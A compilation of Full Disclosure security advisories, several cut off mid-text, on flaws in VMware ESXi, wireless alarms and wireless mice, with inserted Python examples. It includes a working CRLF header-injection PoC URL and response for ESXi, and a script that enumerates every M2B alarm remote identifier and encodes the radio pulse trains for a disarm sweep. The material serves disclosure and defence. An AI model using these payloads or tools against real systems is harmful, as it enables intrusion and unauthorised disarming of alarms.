[FD] [SYSS-2016-063] VMware ESXi 6 - Improper Input Validation (CWE-20)

2016-08-05 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-063
Product: VMware vSphere Hypervisor (ESXi)
Manufacturer: VMware, Inc.
Affected Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)
 VMware vCenter Server 6.0 U2
Tested Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)
Vulnerability Type: Improper Input Validation (CWE-20)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2016-07-01
Solution Date: 2016-08-04
Public Disclosure: 2016-08-05
CVE Reference: CVE-2016-5331
Authors of Advisory: Matthias Deeg (SySS GmbH)



Overview:

VMware vSphere Hypervisor is a type-1 hypervisor for running virtual
machines.

The manufacturer describes the product as follows (see [1]):

"Virtualize even the most resource-intensive applications with peace of
mind. VMware vSphere Hypervisor is based on VMware ESXi, the hypervisor
architecture that sets the industry standard for reliability and
performance."

Due to improper input validation, the web server of VMware ESXi 6 is
prone to HTTP response injection attacks.



Vulnerability Details:

SySS GmbH found out that the web server of VMware ESXi 6 is vulnerable
to HTTP response injection attacks, as arbitrarily supplied URL
parameters are copied into the Location header of the server response
without sufficient input validation: CR/LF sequences contained in the
query string are neither rejected nor encoded.

Thus, an attacker can craft a URL with a specially formed URL parameter
that injects attacker-controlled data, i.e. additional header lines,
into the response of the VMware ESXi web server.

Depending on the context, this allows different attacks. If
such a URL is visited by a victim, it may for example be possible to
set web browser cookies in the victim's web browser, execute arbitrary
JavaScript code, or poison caches of proxy servers.



Proof of Concept (PoC):

The following URL is a simple attack vector to illustrate the HTTP
response header injection vulnerability by setting an
attacker-controlled session cookie named "test" with the value "31337"
within the victim's web browser:

https:///?syss%0d%0aset-cookie:test=31337%0d%0at=1

The corresponding HTTP GET request and the VMware ESXi web server
response are as follows:

GET /?syss%0d%0aset-cookie:test=31337%0d%0at=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close


HTTP/1.1 303 See Other
Date: Thu, 30 Jun 2016 15:12:23 GMT
Connection: close
Location: /?syss
set-cookie:test=31337
t=1/
X-Frame-Options: DENY
Content-Length: 0
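
The following Python script is an added example and not code from the
SySS advisory or from VMware. It re-parses the PoC response above the
way an HTTP client does, so that the CR/LF sequences inside the Location
value show up as separate (attacker-supplied) headers, and it puts the
flawed redirect construction next to a variant that refuses control
characters. The sample response is reconstructed from the advisory text;
the hostname is omitted as in the original PoC.

```python
# Added example, not code from the SySS advisory or from VMware: shows how a
# client-side header parser turns the CR/LF in the PoC Location value into
# extra headers, and contrasts the flawed redirect construction with one that
# refuses control characters. The sample response is reconstructed from the
# advisory text (host omitted, as there).
from __future__ import annotations
from urllib.parse import quote, unquote

# The query string from the advisory's PoC URL, decoded to raw characters.
PAYLOAD = unquote("syss%0d%0aset-cookie:test=31337%0d%0at=1")

# Constructed copy of the PoC response shown above.
POC_RESPONSE = (
    b"HTTP/1.1 303 See Other\r\n"
    b"Date: Thu, 30 Jun 2016 15:12:23 GMT\r\n"
    b"Connection: close\r\n"
    b"Location: /?syss\r\nset-cookie:test=31337\r\nt=1/\r\n"
    b"X-Frame-Options: DENY\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Header names the server legitimately sends on this redirect.
EXPECTED = {"date", "connection", "location", "x-frame-options", "content-length"}


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Split a raw response the way an HTTP client does: every CRLF ends a
    header line, so a CRLF injected into a header *value* produces new
    header lines that the client treats as if the server had sent them."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = []
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.decode("latin-1").partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def injected_headers(raw: bytes, expected: set[str] = EXPECTED) -> list[tuple[str, str]]:
    """Header lines outside the server's own header set, i.e. the
    attacker-controlled lines produced by the injected CR/LF sequences."""
    return [(n, v) for n, v in parse_headers(raw) if n not in expected]


def build_response(location: str) -> bytes:
    """Assemble a minimal 303 the way the vulnerable server effectively does:
    the Location value is written into the header block unchanged."""
    return (
        "HTTP/1.1 303 See Other\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def vulnerable_location(query: str) -> str:
    # The flaw: the decoded query string is copied into the header verbatim.
    return "/?" + query


def safe_location(query: str) -> str:
    # Hardened variant: refuse any control character (CR, LF, NUL, ...) and
    # percent-encode the remainder so the value stays on one header line.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in query):
        raise ValueError("control character in redirect target")
    return "/?" + quote(query, safe="=&")


if __name__ == "__main__":
    for name, value in injected_headers(POC_RESPONSE):
        print(f"injected header in PoC response: {name!r} -> {value!r}")
    print(injected_headers(build_response(vulnerable_location(PAYLOAD))))
    try:
        safe_location(PAYLOAD)
    except ValueError as exc:
        print("hardened builder rejected payload:", exc)
```

The same parser is a quick regression check against a patched server:
request the PoC URL, feed the raw response to `injected_headers()`, and
expect an empty list.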



Solution:

The manufacturer VMware has fixed the reported security vulnerability
and disclosed detailed information about the issue and a software update
for affected products in its security advisory VMSA-2016-0010 [4].



Disclosure Timeline:

2016-07-01: Vulnerability reported to manufacturer
2016-07-01: Manufacturer acknowledges e-mail with SySS security advisory
2016-07-14: Manufacturer further investigates the reported security
issue
2016-07-22: Manufacturer announces disclosure of this security issue
2016-08-04: Public release of VMware security advisory VMSA-2016-0010
and security update
2016-08-05: Public release of SySS security advisory



References:

[1] Product website for VMware vSphere Hypervisor (ESXi)
https://my.vmware.com/web/vmware/info/slug/datacenter_cloud_infrastructure/vmware_vsphere_hypervisor_esxi/6_0
[2] SySS Security Advisory SYSS-2016-063
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-063.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[4] VMware Security Advisory VMSA-2016-0010
http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html



Credits:

This security vulnerability was independently found and reported by
Matthias Deeg of SySS GmbH, Vladimir Ivanov, Andrey Evlanin, Mikhail
Stepankin, Artem Kondratenko, Arseniy Sharoglazov of Positive
Technologies, Matt Foster of Netcraft Ltd, Eva Esteban Molina of
A2secure and Ammarit Thongthua (see [4]).

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information prov

[FD] [SYSS-2016-117] ABUS Secvest (FUAA50000) - Missing Protection against Replay Attacks

2017-02-21 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-117
Product: ABUS Secvest (FUAA50000)
Manufacturer: ABUS
Affected Version(s): v1.01.00
Tested Version(s): v1.01.00
Vulnerability Type: Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-11-28
Solution Date: -
Public Disclosure: 2017-02-20
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

ABUS Secvest (FUAA50000) is a wireless alarm system with different
features.

Some of the supported features as described by the manufacturer are
(see [1]):

"
* Convenient operation via the app (Android/iOS), integrated web
  browser and also at the alarm panel
* For up to 50 users with freely selectable control options
  (code/chip key/remote control)
* Active intrusion protection in combination with additional mechatronic
  wireless window/door locks
* Video verification of alarms via email, push notifications or via the
  app
* Up to 48 individually identifiable wireless detectors, eight control
  panels, 50 remote controls
* Integrated dialling device
* VdS Home certified and EN 50131-1 Level 2
* Alarm verification via the integration of up to six IP cameras
* 32 additional wireless outputs for flexible event control
* Switching to monitoring station via protocols possible
"

Due to an insecure implementation of the used 868 MHz radio
communication, the wireless alarm system ABUS Secvest is vulnerable to
replay attacks.



Vulnerability Details:

SySS GmbH found out that the radio communication protocol used by the
ABUS Secvest wireless alarm system (FUAA50000) and its remote control
(FUBE50013) is not protected against replay attacks. Therefore, an
attacker can record the radio signal of the wireless remote control, for
example using a software-defined radio, when the owner disarms the alarm
system, and play it back at a later time in order to disarm the alarm
system at will.



Proof of Concept (PoC):

SySS GmbH could successfully perform a replay attack as described in the
previous section using a software-defined radio and disarm an ABUS
Secvest wireless alarm system in an unauthorized way.



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-11-28: Vulnerability reported to manufacturer
2016-12-05: Vulnerability reported to manufacturer again
2016-12-06: Manufacturer responded to emails
2016-12-08: Exchanged further information with manufacturer
2017-02-07: Asked manufacturer for current status concerning the
reported security issue
2017-02-20: Public release of security advisory



References:

[1] Product website for ABUS Secvest wireless alarm system
https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System
[2] SySS Security Advisory SYSS-2016-117
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-117.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
[4] Plusminus video: "Von wegen sicher - Wie leicht Alarmanlagen zu
knacken sind" (Anything but secure: how easily alarm systems can be
cracked)
http://www.daserste.de/information/wirtschaft-boerse/plusminus/videos/von-wegen-sicher-wie-leicht-alarmanlagen-zu-knacken-sind-100.html



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEE0fCgNfBs5nXNuQUU2aS/ajStTasFAliqyqgACgkQ2aS/ajSt
TauDyBAAooHv0j6CNMghjO72OmILNbjUhXovwiPj4XqpQjKxb7NOxDpSzEfrKZPy
B2m2Ki6dUW52a0wBEoWec4ONAH+c1eDFBehFlhryGkSq

[FD] [SYSS-2016-058] CHERRY B.UNLIMITED AES - Insufficient Verification of Data Authenticity (CWE-345)

2016-09-30 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-058
Product: CHERRY B.UNLIMITED AES
Manufacturer: Cherry GmbH
Affected Version(s): JD-0400EU-2/01
Tested Version(s): JD-0400EU-2/01
Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345)
Mouse Spoofing Attack
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-06-28
Solution Date: -
Public Disclosure: 2016-09-30
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

CHERRY B.UNLIMITED AES is a wireless desktop set consisting of a
mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"CHERRY B. UNLIMITED AES combines secure data transmission and an
advanced energy supply in a design which has been thought through to the
very last detail. For high professional requirements and security both
at home and in the workplace."

Some of the key benefits of CHERRY B.UNLIMITED AES are (see [2]):

* Data transmission using 128-bit encryption, complying to Advanced
  Encryption Standard (AES)
* USB cable charging function for both keyboard & mouse - even when in
  use
* High-quality, pre-charged NiMH batteries from GP with a very low
  self-discharge
* Almost interference-free wireless 2.4 GHz technology (range of up to
  10 metres)
* 3-button mouse: infrared sensor and adjustable resolution
  (1,000/2,000 dpi) with ergonomic side panels
* Multi-station capability operation of several wireless products in
  one room
* Easy to install, requiring no technical knowledge
* Mini USB receiver
* Keyboard awarded the "Blauer Engel" environmental seal

Due to unencrypted and unauthenticated mouse data communication, the
wireless desktop set CHERRY B.UNLIMITED AES is prone to mouse spoofing
attacks.



Vulnerability Details:

The SySS GmbH found out that the mouse of the wireless desktop set
CHERRY B.UNLIMITED AES is prone to spoofing attacks, as the mouse
data communication is unencrypted and unauthenticated.

An attacker can analyze the unencrypted mouse data packets of the 2.4
GHz radio communication sent by the mouse to the receiver (USB dongle)
in order to learn the used protocol. By knowing the used mouse data
protocol, it is possible to spoof mouse actions like mouse movements or
mouse clicks by sending forged data packets.

Thus, an attacker is able to remotely control the mouse pointer of a
target system that is operated with the wireless desktop set CHERRY
B.UNLIMITED AES. If the graphical user interface of the victim's system
is unlocked, an attacker can for example send a list of mouse actions
that start the virtual on-screen keyboard of the operating system and
execute arbitrary commands in the context of the currently logged in
user, for instance a download and execute attack vector.

As the attacker may not have an unobstructed view of the target system's
screen and may not know the operating system in use, the screen
resolution, or the current mouse settings, this kind of mouse spoofing
attack is based on heuristics. On an unlocked and unattended system,
however, an attacker can simply try attack vectors for different target
system configurations one after another.



Proof of Concept (PoC):

The SySS GmbH could successfully perform mouse spoofing attacks against
a target system operated with the wireless desktop set CHERRY
B.UNLIMITED AES using an in-house developed software tool in combination
with the USB radio dongle Crazyradio PA (see [3]).

A proof-of-concept mouse spoofing attack resulting in remote code
execution using the SySS software tool Radioactive Mouse is demonstrated
in a video (see [4]).



Solution:

The SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-06-28: Vulnerability reported to manufacturer
2016-09-30: Public release of the security advisory



References:

[1] Data sheet for CHERRY B.UNLIMITED AES
http://cherry.de/PDF/EN_CHERRY_B_UNLIMITED_AES.pdf
[2] Product website for CHERRY B.UNLIMITED AES
http://cherry.de/cid/wireless_keyboards_CHERRY_B_UNLIMITED_AES.htm?rdeLocaleAttr=en_id=
[3] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[4] SySS Proof-of-Concept Mouse Spoofing Attack Video
https://www.youtube.com/watch?v=PkR8EODee44
[5] SySS Security Advisory SYSS-2016-058
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-058.txt
[6] SyS

[FD] [SYSS-2016-060] Logitech M520 - Insufficient Verification of Data Authenticity (CWE-345)

2016-09-30 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-060
Product: M520 (Mouse of Wireless Combo MK520)
Manufacturer: Logitech
Affected Version(s): Model Y-R0012
Tested Version(s): Model Y-R0012
Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345)
Mouse Spoofing Attack
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-06-28
Solution Date: -
Public Disclosure: 2016-09-30
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)



Overview:

Logitech Wireless Combo MK520 is a wireless desktop set consisting of a
mouse and a keyboard.

The manufacturer describes the product as follows (see [1]):

"A keyboard and mouse that puts convenience and control comfortably at
your fingertips"

Due to unencrypted and unauthenticated mouse data communication, the
wireless desktop set Logitech Wireless Combo MK520 is prone to mouse
spoofing attacks.



Vulnerability Details:

The SySS GmbH found out that the mouse of the wireless desktop set
Logitech Wireless Combo MK520 is prone to spoofing attacks, as the mouse
data communication is unencrypted and unauthenticated.

An attacker can analyze the unencrypted mouse data packets of the 2.4
GHz radio communication sent by the mouse to the receiver (USB dongle)
in order to learn the used protocol. By knowing the used mouse data
protocol, it is possible to spoof mouse actions like mouse movements or
mouse clicks by sending forged data packets.

Thus, an attacker is able to remotely control the mouse pointer of a
target system that is operated with the wireless desktop set Logitech
Wireless Combo MK520. If the graphical user interface of the victim's
system is unlocked, an attacker can for example send a list of mouse
actions that start the virtual on-screen keyboard of the operating
system and execute arbitrary commands in the context of the currently
logged in user, for instance a download and execute attack vector.

As the attacker may not have an unobstructed view of the target system's
screen and may not know the operating system in use, the screen
resolution, or the current mouse settings, this kind of mouse spoofing
attack is based on heuristics. On an unlocked and unattended system,
however, an attacker can simply try attack vectors for different target
system configurations one after another.



Proof of Concept (PoC):

The SySS GmbH could successfully perform mouse spoofing attacks against
a target system operated with the wireless desktop set Logitech Wireless
Combo MK520 using an in-house developed software tool in combination
with the USB radio dongle Crazyradio PA (see [2]).

A proof-of-concept mouse spoofing attack resulting in remote code
execution using the SySS software tool Radioactive Mouse is demonstrated
in a video (see [4]).



Solution:

The SySS GmbH is not aware of a solution for this reported security
vulnerability.

For further information please contact the manufacturer.



Disclosure Timeline:

2016-06-28: Vulnerability reported to manufacturer
2016-09-30: Public release of the security advisory



References:

[1] Product website for Logitech Wireless Combo MK520
http://www.logitech.com/en-us/product/wireless-combo-mk520
[2] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[3] SySS Security Advisory SYSS-2016-060
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-060.txt
[4] SySS Proof-of-Concept Mouse Spoofing Attack Video
https://www.youtube.com/watch?v=PkR8EODee44
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg and Gerhard
Klostermeier of the SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as 

[FD] Radioactive Mouse States the Obvious: Exploiting unencrypted and unauthenticated data communication of wireless mice

2016-09-30 Thread Matthias Deeg
tl;dr

Today, SySS published a proof-of-concept video demonstrating a mouse
spoofing attack resulting in remote code execution due to insecure
wireless mouse communication:

https://www.youtube.com/watch?v=PkR8EODee44

-

Radioactive Mouse States the Obvious

In the course of their research project about modern wireless desktop
sets using AES encryption, Expert IT Security consultant Matthias Deeg
and IT Security Consultant Gerhard Klostermeier noticed that the radio
communication of all tested wireless mice so far was unencrypted and
unauthenticated.

The insight that radio communication of many wireless mice is insecure
and can be exploited in specific attack scenarios is not new. The fact
that this well-known security issue still exists in current wireless
mice which are part of modern wireless desktop sets using AES encryption
for keyboard data, however, brought SySS to raise the awareness for this
security vulnerability and the associated security risks once again.

By knowing the used mouse data protocol, an attacker can spoof mouse
actions like mouse movements or mouse clicks. Thus, an attacker can
remotely control the mouse pointer of a target system in an unauthorized
way. Using trial & error and good educated guesses (heuristic method),
mouse spoofing attacks can result in remote code execution on affected
target systems.

Matthias Deeg and Gerhard Klostermeier developed a proof-of-concept
software tool named Radioactive Mouse for conducting automated mouse
spoofing attacks. A proof-of-concept mouse spoofing attack resulting in
remote code execution is demonstrated in the following video:
https://www.youtube.com/watch?v=PkR8EODee44

Further information about the vulnerabilities in affected wireless mice
of different manufacturers, namely Cherry, Microsoft, Logitech, and
Perixx, is given in the following four security advisories:

SYSS-2016-058: CHERRY B.UNLIMITED AES - Insufficient Verification of
Data Authenticity (CWE-345), Mouse Spoofing Attack
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-058.txt

SYSS-2016-059: Microsoft Wireless Desktop 2000 - Insufficient
Verification of Data Authenticity (CWE-345), Mouse Spoofing Attack
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-059.txt

SYSS-2016-060: M520 (Mouse of Wireless Combo MK520) - Insufficient
Verification of Data Authenticity (CWE-345), Mouse Spoofing Attack
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-060.txt

SYSS-2016-061: PERIDUO-710W - Insufficient Verification of Data
Authenticity (CWE-345), Mouse Spoofing Attack
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-061.txt

Moreover, Matthias Deeg and Gerhard Klostermeier will present the
results of their research project about modern wireless desktop sets at
the following IT security conferences this autumn:

Hack.lu, October 18-20, 2016, Luxembourg
Hacktivity, October 21-22, 2016, Budapest
Ruxcon, October 22-23, 2016, Melbourne
DeepSec, November 10-11, 2016, Vienna
ZeroNights, November 17-18, 2016, Moscow

Currently, SySS recommends not using wireless mice without encryption
and authentication in security-sensitive environments.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] [SYSS-2016-064] Multi Kon Trade M2B GSM Wireless Alarm System - Improper Restriction of Excessive Authentication Attempts (CWE-307)

2016-11-25 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-064
Product: M2B GSM Wireless Alarm System
Manufacturer: Multi Kon Trade
Affected Version(s): Unspecified
Tested Version(s): Unspecified
Vulnerability Type: Improper Restriction of Excessive Authentication
Attempts (CWE-307)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2016-07-05
Solution Date: -
Public Disclosure: 2016-11-23
CVE Reference: Not yet assigned
Author of Advisory: Gerhard Klostermeier, SySS GmbH



Overview:

The M2B GSM wireless alarm system by Multi Kon Trade (MKT) was tested
for possible security issues.

Some features of this alarm system as described by the manufacturer are
(see [1]):

* You will be notified of any alarm by call or by SMS message.
* The alarm system has a battery which will last 6 to 8 hours in case
  of a blackout.
* You can pair up to 99 devices (sensors, remote control, etc.).
* You do not have to run any cables. Everything is wireless.
* It is possible to trigger alarms in case of fire, even if the
  alarm is disabled.
* It is possible to trigger the alarm with a delay.

Due to an insecure implementation of the used 433 MHz radio
communication, the wireless alarm system M2B GSM is vulnerable to
brute-force attacks.



Vulnerability Details:

SySS GmbH found out that the 433 MHz radio communication of the M2B GSM
wireless alarm system has no protection against brute-force attacks.

A valid (paired) remote control is identified solely by its
eight-character identifier, in which each character is either "0", "1"
or "f" (floating) (see [2]), so there are only 3^8 = 6561 possible
identifiers. Thus, it is possible to send a command signal for every
possible identifier. Via such a brute-force attack, for instance, it is
possible to disarm an armed M2B GSM wireless alarm system remotely in an
unauthorized manner.



Proof of Concept (PoC):

SySS GmbH built a small device that is able to arm and disarm every M2B
GSM wireless alarm system within its radio range in at most 40 minutes.
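
The following Python script is an added example, not SySS code and not a
description of the device SySS built. It enumerates the tri-state
identifier space from the Vulnerability Details section and estimates how
long a full sweep stays on air. The symbol-to-pulse mapping follows the
PT2260/PT2262 encoder family described in the datasheet [2]; the 350 us
pulse unit, the 4 command symbols, the placeholder command "0101" and the
4-frame repeat count are assumptions typical of 433 MHz remotes and are
not values published in the advisory.

```python
# Added example, not SySS code: enumerates the PT2260 tri-state identifier
# space described above and estimates how long a brute-force sweep stays on
# air. The symbol-to-pulse mapping follows the PT2260/PT2262 encoder family
# (each symbol is two pulses; '0' = short high/long low twice, '1' = long
# high/short low twice, 'f' = short high/long low then long high/short low;
# sync = one short high followed by a 31-unit low). The 350 us unit, the 4
# command symbols, the placeholder command "0101" and the 4-frame repeat
# count are assumptions, not values published in the advisory.
from __future__ import annotations
from itertools import product

UNIT_US = 350          # assumed base pulse length (remote's oscillator period)
ADDRESS_LEN = 8        # identifier symbols, as stated in the advisory
DATA_LEN = 4           # remaining PT2260 word symbols carry the command
FRAME_REPEATS = 4      # assumed identical frames a receiver wants before acting

SHORT, LONG = UNIT_US, 3 * UNIT_US
SYMBOL_PULSES = {      # symbol -> [(high_us, low_us), (high_us, low_us)]
    "0": [(SHORT, LONG), (SHORT, LONG)],
    "1": [(LONG, SHORT), (LONG, SHORT)],
    "f": [(SHORT, LONG), (LONG, SHORT)],
}
SYNC_PULSE = (UNIT_US, 31 * UNIT_US)


def all_identifiers() -> list[str]:
    """Every identifier a paired remote could have: 3^8 = 6561 strings."""
    return ["".join(p) for p in product("01f", repeat=ADDRESS_LEN)]


def encode_word(symbols: str) -> list[tuple[int, int]]:
    """Turn a 12-symbol PT2260 word (8 address + 4 data) into the pulse
    train (high_us, low_us) an OOK transmitter would key."""
    if len(symbols) != ADDRESS_LEN + DATA_LEN:
        raise ValueError("PT2260 word is 12 symbols")
    pulses: list[tuple[int, int]] = []
    for s in symbols:
        pulses.extend(SYMBOL_PULSES[s])
    pulses.append(SYNC_PULSE)
    return pulses


def frame_us(symbols: str) -> int:
    """Air time of one frame; every symbol costs 8 units, the sync 32 units."""
    return sum(high + low for high, low in encode_word(symbols))


def sweep_seconds(command: str, repeats: int = FRAME_REPEATS) -> float:
    """Lower bound for sending `command` to every identifier, back to back."""
    total_us = sum(frame_us(ident + command) * repeats for ident in all_identifiers())
    return total_us / 1e6


if __name__ == "__main__":
    ids = all_identifiers()
    print(f"{len(ids)} identifiers, {frame_us(ids[0] + '0101') / 1000:.1f} ms per frame")
    print(f"full sweep with {FRAME_REPEATS} repeats: {sweep_seconds('0101') / 60:.1f} min")
```

Under these assumptions one frame takes 44.8 ms and a sweep of all 6561
identifiers with four repeats each takes about 19.6 minutes, which is
consistent with the 40-minute upper bound reported above for arming and
disarming every system in range.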



Solution:

An additional anti-jammer device can be purchased from the vendor. This
sensor is intended to detect devices that try to disarm the system by
brute force; if such a device is detected, the alarm is triggered.
(Solution as suggested by the vendor.)



Disclosure Timeline:

2016-07-05: Vulnerability reported to manufacturer
2016-10-13: Response from the vendor with the solution on how to
mitigate the risk
2016-11-23: Public release of security advisory



References:

[1] M2B GSM Wireless Alarm System, Multi Kon Trade
http://multikontrade.de/GSM-Funk-Alarmanlage
[2] PT2260 Remote Control Encoder, Princeton Technology Corp.
http://www.princeton.com.tw/Portals/0/Product/PT2260_4.pdf
[3] SySS Security Advisory SYSS-2016-064
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-064.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Gerhard Klostermeier of SySS
GmbH.

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-BEGIN PGP SIGNATURE-
[FD] [SYSS-2016-072] Olympia Protect 9061 - Missing Protection against Replay Attacks

2016-11-25 Thread Matthias Deeg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Advisory ID: SYSS-2016-072
Product: Protect 9061
Manufacturer: Olympia
Affected Version(s): Article No. 5943 rev.03
Tested Version(s): Article No. 5943 rev.03
Vulnerability Type: Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2016-07-21
Solution Date: 2016-11-14
Public Disclosure: 2016-11-23
CVE Reference: Not yet assigned
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

The Olympia Protect 9061 is a wireless alarm system with different
features.

Some of the supported features as described by the manufacturer are
(see [1]):

"
Wireless alarm system with emergency call and handsfree function
Integrated GSM (Dual Band) phone dialling with message function
Handsfree/Room monitoring functions on the base unit
Up to 10 phone numbers can be programmed
Acoustic alarm via built-in siren
Programme the forwarding of alarms to external telephones (e.g. mobile
phones)
Alarm per Telephone with message function
Individual message for each sensor, max. 10 seconds long
Power failure backup in the base unit
Can be upgraded to support up to max. 32 sensors
Easy integration of the optional sensors via Plug & Play method
"

Due to an insecure implementation of the used 868 MHz radio
communication, the wireless alarm system Olympia Protect 9061 is
vulnerable to replay attacks.



Vulnerability Details:

SySS GmbH found out that the radio communication protocol used by the
Olympia Protect 9061 wireless alarm system and its remote control is not
protected against replay attacks. Therefore, an attacker can record the
radio signal of a wireless remote control, for example using a
software-defined radio, when the alarm system is disarmed by its owner,
and play it back at a later time in order to disable the alarm system at
will.



Proof of Concept (PoC):

SySS GmbH could successfully perform a replay attack as described in the
previous section using a software-defined radio and disarm an Olympia
Protect 9061 wireless alarm system in an unauthorized way.
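
The following Python model is an added example and not code from either
SySS advisory. It illustrates the replay problem reported for the ABUS
Secvest (SYSS-2016-117) and the Olympia Protect 9061 (SYSS-2016-072): a
remote whose disarm frame is static can be recorded once and accepted
again later, whereas a remote that binds each frame to a fresh counter
and a message authentication code is not. The frame layouts, the shared
key and the counter window are illustrative assumptions and do not
describe the real products' protocols.

```python
# Added example, not code from either SySS advisory: a minimal model of a
# remote/panel pair showing why a static disarm frame can be replayed, next to
# a design that rejects the replay. Frame layouts, the shared key and the
# counter scheme are illustrative assumptions, not the real protocols.
from __future__ import annotations
import hashlib
import hmac
import struct

KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed demo key
DISARM, ARM = b"D", b"A"
MAC_LEN = 8       # truncated HMAC-SHA256 tag (assumed size for a radio frame)
WINDOW = 16       # how far ahead a counter may jump (missed key presses)


class StaticRemote:
    """Remote whose frame depends only on its identity and the button."""
    def __init__(self, remote_id: bytes):
        self.remote_id = remote_id

    def press(self, command: bytes) -> bytes:
        return self.remote_id + command


class StaticPanel:
    """Panel that checks only that the identity is paired."""
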